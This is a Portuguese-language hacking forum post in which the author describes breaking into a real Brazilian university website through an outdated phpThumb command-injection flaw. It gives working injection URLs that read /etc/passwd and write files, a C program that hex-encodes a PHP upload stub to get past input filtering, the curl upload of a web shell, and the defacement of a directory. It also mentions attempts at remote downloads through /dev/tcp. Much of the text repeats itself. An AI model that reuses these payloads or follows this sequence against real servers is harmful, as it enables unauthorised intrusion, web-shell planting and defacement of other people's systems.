Tava aqui de bobeira , sem fazer nada , ai comecei a procurar sites vulneraveis , achei o
site da UFMA , estava vulneravel a RCE , por causa do phpthumb desatualizado, o que eu fiz,
fui procurar no google por um exploit pra essa bagaça , achei esse:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
O codigo não funcionou :/ !
Wget , Curl , Links , lynx , cat </dev/tcp/xxx.xxx.xxx.xxx/xxxxx , entre outras tentativas de fazer download da shell no servidor não deram certo tambem.
Porem o site estava mesmo vulneravel a RCE , como podem ver abaixo:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; cat /etc/passwd ; &phpThumbDebug=9
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
(quase nao da pra enxergar)
Comecei a procurar por um diretorio que era possivel criar arquivos , e achei (/var/www/novo/audios)
fiz o primeiro teste:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; echo 'mmxm' > /var/www/novo/audios/x.txt ; &phpThumbDebug=9
E deu certo , realmente tinha permissões de escrita na diretorio
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Tendo isso em mente , logo eu pensei em upar uma shell no servidor usando o comando echo ,
então la fui eu , echo '<? phpinfo(); ?>' > /var/www/audios/info.php
mas infelizmente o arquivo não foi criado , acho que foi por causa do '<' , então , eu sabia que não daria
certo usando o echo (dessa forma) , fui procurar um jeito de transfomar hexadecimal ou ascii em char , usando comandos do linux
para conseguir criar a shell
encontrei o printf , era so por printf "\x<hex>" que funcionaria e tambem lembrei que usando o echo poderia
conseguir a mesma coisa , era so usar o parametro -e , pensando nisso eu fiz um programa para
transformar string em hexadecimal , segue o codigo abaixo:
Depois disso eu transformei um codigo que faz upload de arquivos em hex
eeeeeeee deu certo
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Agora é só mover o arquivo (/var/www/novo/audios/t.txt) para outro com a extensão .php , renomeiei o arquivo para def.php
Agora é so upar a shell !
%# curl -F userfile=@fx0.php [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Shell Upada com sucesso:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Infelizmente não consegui fazer back-connect no servidor , nem bind , por causa do iptables ,
achei um shell-script la que so permitia conexão em algumas portas (80,110 e outras) ,
ai não deu pra rootear o server , (era necessario se eu quisesse ownar a pagina principal ,
ja que não tinha permissão pra editar/criar os arquivos)
então eu ownei o dir rss mesmo :
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
site da UFMA , estava vulneravel a RCE , por causa do phpthumb desatualizado, o que eu fiz,
fui procurar no google por um exploit pra essa bagaça , achei esse:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
O codigo não funcionou :/ !
Wget , Curl , Links , lynx , cat </dev/tcp/xxx.xxx.xxx.xxx/xxxxx , entre outras tentativas de fazer download da shell no servidor não deram certo tambem.
Porem o site estava mesmo vulneravel a RCE , como podem ver abaixo:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; cat /etc/passwd ; &phpThumbDebug=9
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
(quase nao da pra enxergar)
Comecei a procurar por um diretorio que era possivel criar arquivos , e achei (/var/www/novo/audios)
fiz o primeiro teste:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; echo 'mmxm' > /var/www/novo/audios/x.txt ; &phpThumbDebug=9
E deu certo , realmente tinha permissões de escrita na diretorio
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Tendo isso em mente , logo eu pensei em upar uma shell no servidor usando o comando echo ,
então la fui eu , echo '<? phpinfo(); ?>' > /var/www/audios/info.php
mas infelizmente o arquivo não foi criado , acho que foi por causa do '<' , então , eu sabia que não daria
certo usando o echo (dessa forma) , fui procurar um jeito de transfomar hexadecimal ou ascii em char , usando comandos do linux
para conseguir criar a shell
encontrei o printf , era so por printf "\x<hex>" que funcionaria e tambem lembrei que usando o echo poderia
conseguir a mesma coisa , era so usar o parametro -e , pensando nisso eu fiz um programa para
transformar string em hexadecimal , segue o codigo abaixo:
- Código:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc,char **argv){
if(argc != 2)
exit(0);
int i;
const char *porcaria = argv[1];
for(i=0;i<strlen(porcaria);i++)
printf("\\x%x",porcaria[i]);
printf("\n");
}
Depois disso eu transformei um codigo que faz upload de arquivos em hex
- Código:
%# ./hex '<? move_uploaded_file($_FILES["userfile"]["tmp_name"], $_FILES["userfile"]["name"]) ?>'
\x3c\x3f\x20\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f\x66\x69\x6c\x65\x28\x24\x5f\x46\x49\x4c\x45\x53\x5b\x22\x75\x73\x65\x72\x66\x69\x6c\x65\x22\x5d\x5b\x22\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x22\x5d\x2c\x20\x24\x5f\x46\x49\x4c\x45\x53\x5b\x22\x75\x73\x65\x72\x66\x69\x6c\x65\x22\x5d\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x29\x20\x3f\x3e
- Código:
http://www.ufma.br/phpthumbs/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; printf \x3c\x3f\x20\x6d\x6f\x76\x65\x5f\x75\x70\x6c\x6f\x61\x64\x65\x64\x5f\x66\x69\x6c\x65\x28\x24\x5f\x46\x49\x4c\x45\x53\x5b\x22\x75\x73\x65\x72\x66\x69\x6c\x65\x22\x5d\x5b\x22\x74\x6d\x70\x5f\x6e\x61\x6d\x65\x22\x5d\x2c\x20\x24\x5f\x46\x49\x4c\x45\x53\x5b\x22\x75\x73\x65\x72\x66\x69\x6c\x65\x22\x5d\x5b\x22\x6e\x61\x6d\x65\x22\x5d\x29\x20\x3f\x3e > /var/www/novo/audios/t.txt ; &phpThumbDebug=9
eeeeeeee deu certo
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Agora é só mover o arquivo (/var/www/novo/audios/t.txt) para outro com a extensão .php , renomeiei o arquivo para def.php
Agora é so upar a shell !
%# curl -F userfile=@fx0.php [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Shell Upada com sucesso:
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Infelizmente não consegui fazer back-connect no servidor , nem bind , por causa do iptables ,
achei um shell-script la que so permitia conexão em algumas portas (80,110 e outras) ,
ai não deu pra rootear o server , (era necessario se eu quisesse ownar a pagina principal ,
ja que não tinha permissão pra editar/criar os arquivos)
então eu ownei o dir rss mesmo :
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Última edição por mmxm em Sex Mar 07, 2014 9:47 pm, editado 2 vez(es)